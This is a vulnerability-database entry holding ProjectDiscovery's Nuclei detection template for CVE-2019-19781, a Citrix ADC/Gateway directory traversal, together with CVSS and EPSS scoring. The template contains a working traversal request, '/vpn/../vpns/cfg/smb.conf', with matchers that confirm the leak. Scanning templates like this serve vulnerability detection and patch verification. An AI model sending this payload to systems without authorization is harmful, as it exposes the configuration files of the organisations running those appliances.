Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-19781
HistoryApr 05, 2020 - 10:27 p.m.

Citrix ADC and Gateway - Directory Traversal

2020-04-0522:27:04
ProjectDiscovery
github.com
8

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%

Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.

id: CVE-2019-19781

info:
  name: Citrix ADC and Gateway - Directory Traversal
  author: organiccrap,geeknik
  severity: critical
  description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.
  remediation: |
    Apply the necessary security patches provided by Citrix to fix the directory traversal vulnerability.
  reference:
    - https://support.citrix.com/article/CTX267027
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19781
    - https://www.kb.cert.org/vuls/id/619785
    - http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-19781
    cwe-id: CWE-22
    epss-score: 0.975
    epss-percentile: 0.99976
    cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:10.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: citrix
    product: application_delivery_controller_firmware
  tags: cve,cve2019,lfi,kev,packetstorm,citrix

http:
  - method: GET
    path:
      - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[global]"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f061f7d1df5081b9ddfd5eed0b03d118d863197a0180f8a5eca43f87e5ecb6cc022069ca1e38aaf7a7f035286be68225f35aa2f721f0d63bd0a155477d982b730d10:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%